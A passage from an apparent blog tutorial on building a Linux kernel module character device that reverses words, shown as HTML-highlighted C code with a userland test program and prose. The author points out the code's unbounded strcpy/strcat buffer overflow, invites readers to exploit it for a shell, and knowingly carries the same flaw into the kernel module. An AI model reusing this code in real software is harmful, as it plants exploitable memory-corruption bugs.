class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="kt"char/spanspan class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="mi"513/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="s"quot;No dataquot;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"insert_word/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"word/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"n/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"i/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"tmpword/spanspan class="p"[/spanspan class="mi"512/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"word/spanspan class="p")/spanspan class="mi"-1/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"gt;=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="o"--/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="o"++/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"tmpword/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"i/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"tmpword/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"word/spanspan class="p")]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"n/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"memset/spanspan class="p"(/spanspan class="n"data/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="k"sizeof/spanspan class="w" /spanspan class="n"data/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strcpy/spanspan class="p"(/spanspan class="n"data/spanspan class="p",/spanspan class="w" /spanspan class="n"tmpword/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"data/spanspan class="p")]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39; #39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"data/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strcat/spanspan class="p"(/spanspan class="n"data/spanspan class="p",/spanspan class="w" /spanspan class="n"tmpword/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"reverse/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"tmpdata/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"i/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="mi"512/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"tmpdata/spanspan class="p")/spanspan class="mi"-1/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"gt;=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="o"--/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="o"++/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"tmpdata/spanspan class="p"[/spanspan class="n"i/spanspan class="p"]/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="sc"#39; #39;/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"insert_word/spanspan class="p"(/spanspan class="n"word/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="mi"1/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"-1/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"tmpdata/spanspan class="p"[/spanspan class="n"i/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"insert_word/spanspan class="p"(/spanspan class="n"word/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"tmpdata/spanspan class="p")]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: %s lt;stringgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Before: %s/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"data/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"reverse/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;After: %s/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"data/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pSome of you should have noticed the a href="https://en.wikipedia.org/wiki/Buffer_overflow" target="_blank"buffer overflow/a in this application, if you haven't check out my a href="/categories/x86-32-linux.html"x86-32 linux/a section. You can write an exploit for this application and figure out how to get a shell. The character device will have a buffer overflow too, but we're not too worried about this as we are the only people that are going to be using it, if you wanted to secure this application you would just create another counter that always incremented and break when it reaches 512./p pAnyway, testing this application shows that it seems to work fine:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spangcc -o reverse-test-app reverse-test-app.c/span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-test-app span class="s2"quot;this is a test applicationquot;/span/span span class="code-line"span class="go"Before: No data/span/span span class="code-line"span class="go"After: application test a is this/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-test-app span class="s2"quot;application test a is thisquot;/span/span span class="code-line"span class="go"Before: No data/span/span span class="code-line"span class="go"After: this is a test application/span/span span class="code-line"/code/pre/div /td/tr/table pObviously our "datastore" is only holding the data while the application is running so it isn't permanent but the "datastore" in the LKM will be. I guess its worth mentioning here that the "datastore" that we have in our LKM will be exactly the same as here, just a global character array, we could use any memory really but I'm using a character array for simplicity./p pThe functions (codereverse/code and codeinsert_word/code) in the test application can be put into the LKM as is./p pAlmost done, but a userland application can only write to and read from memory in userland; and LKM's should only write to and read from kernelland, so we need a way to copy from and copy to userland in kernelland. Luckily the kernel provides us with functions to be able to do that./p pIn the codeinclude/asm-generic/uaccess.h/code header file (which we'll also need to include) codecopy_from_user/code and codecopy_to_user/code are defined as follows:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"static/spanspan class="w" /spanspan class="kr"inline/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="nf"copy_from_user/spanspan class="p"(/spanspan class="kt"void/spanspan class="w" /spanspan class="o"*/spanspan class="n"to/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"const/spanspan class="w" /spanspan class="kt"void/spanspan class="w" /spanspan class="n"__user/spanspan class="w" /spanspan class="o"*/spanspan class="w" /spanspan class="n"from/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"n/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"might_fault/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"access_ok/spanspan class="p"(/spanspan class="n"VERIFY_READ/spanspan class="p",/spanspan class="w" /spanspan class="n"from/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p"))/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"__copy_from_user/spanspan class="p"(/spanspan class="n"to/spanspan class="p",/spanspan class="w" /spanspan class="n"from/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"n/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kr"inline/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="nf"copy_to_user/spanspan class="p"(/spanspan class="kt"void/spanspan class="w" /spanspan class="n"__user/spanspan class="w" /spanspan class="o"*/spanspan class="n"to/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"const/spanspan class="w" /spanspan class="kt"void/spanspan class="w" /spanspan class="o"*/spanspan class="n"from/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"n/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"might_fault/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"access_ok/spanspan class="p"(/spanspan class="n"VERIFY_WRITE/spanspan class="p",/spanspan class="w" /spanspan class="n"to/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p"))/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"__copy_to_user/spanspan class="p"(/spanspan class="n"to/spanspan class="p",/spanspan class="w" /spanspan class="n"from/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"n/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pBoth of these functions takes 2 void pointers (1 pointing to memory in userland and 1 pointing to memory in kernelland, they are of type void so that any type of data can be transferred), and a number (the amount of data to be copied)./p pWith all of this information we can finally build our character device:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/span span class="code-line"span class="normal"76/span/span span class="code-line"span class="normal"77/span/span span class="code-line"span class="normal"78/span/span span class="code-line"span class="normal"79/span/span span class="code-line"span class="normal"80/span/span span class="code-line"span class="normal"81/span/span span class="code-line"span class="normal"82/span/span span class="code-line"span class="normal"83/span/span span class="code-line"span class="normal"84/span/span span class="code-line"span class="normal"85/span/span span class="code-line"span class="normal"86/span/span span class="code-line"span class="normal"87/span/span span class="code-line"span class="normal"88/span/span span class="code-line"span class="normal"89/span/span span class="code-line"span class="normal"90/span/span span class="code-line"span class="normal"91/span/span span class="code-line"span class="normal"92/span/span span class="code-line"span class="normal"93/span/span span class="code-line"span class="normal"94/span/span span class="code-line"span class="normal"95/span/span span class="code-line"span class="normal"96/span/span span class="code-line"span class="normal"97/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/module.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/init.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/miscdevice.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/fs.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;asm/uaccess.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="n"MODULE_AUTHOR/spanspan class="p"(/spanspan class="s"quot;0xe7, 0x1equot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"MODULE_DESCRIPTION/spanspan class="p"(/spanspan class="s"quot;A simple character device which reverses the words in a stringquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"MODULE_LICENSE/spanspan class="p"(/spanspan class="s"quot;GPLquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="cp"#define DEVICE_SIZE 512/span/span span class="code-line"/span span class="code-line"span class="kt"char/spanspan class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="n"DEVICE_SIZE/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"]/spanspan class="o"=/spanspan class="s"quot;no data has been written yetquot;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"insert_word/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"word/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"n/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"i/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"tmpword/spanspan class="p"[/spanspan class="n"DEVICE_SIZE/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"word/spanspan class="p")/spanspan class="mi"-1/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"gt;=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="o"--/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="o"++/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"tmpword/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"i/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"tmpword/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"word/spanspan class="p")]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"n/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"memset/spanspan class="p"(/spanspan class="n"data/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="k"sizeof/spanspan class="w" /spanspan class="n"data/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strcpy/spanspan class="p"(/spanspan class="n"data/spanspan class="p",/spanspan class="w" /spanspan class="n"tmpword/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"data/spanspan class="p")]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39; #39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"data/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strcat/spanspan class="p"(/spanspan class="n"data/spanspan class="p",/spanspan class="w" /spanspan class="n"tmpword/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"reverse/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"tmpdata/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"i/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"DEVICE_SIZE/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"tmpdata/spanspan class="p")/spanspan class="mi"-1/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"gt;=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w" /spanspan class="n"i/spanspan class="o"--/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="o"++/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"tmpdata/spanspan class="p"[/spanspan class="n"i/spanspan class="p"]/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="sc"#39; #39;/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"insert_word/spanspan class="p"(/spanspan class="n"word/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="mi"1/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"c/spanspan class="w" 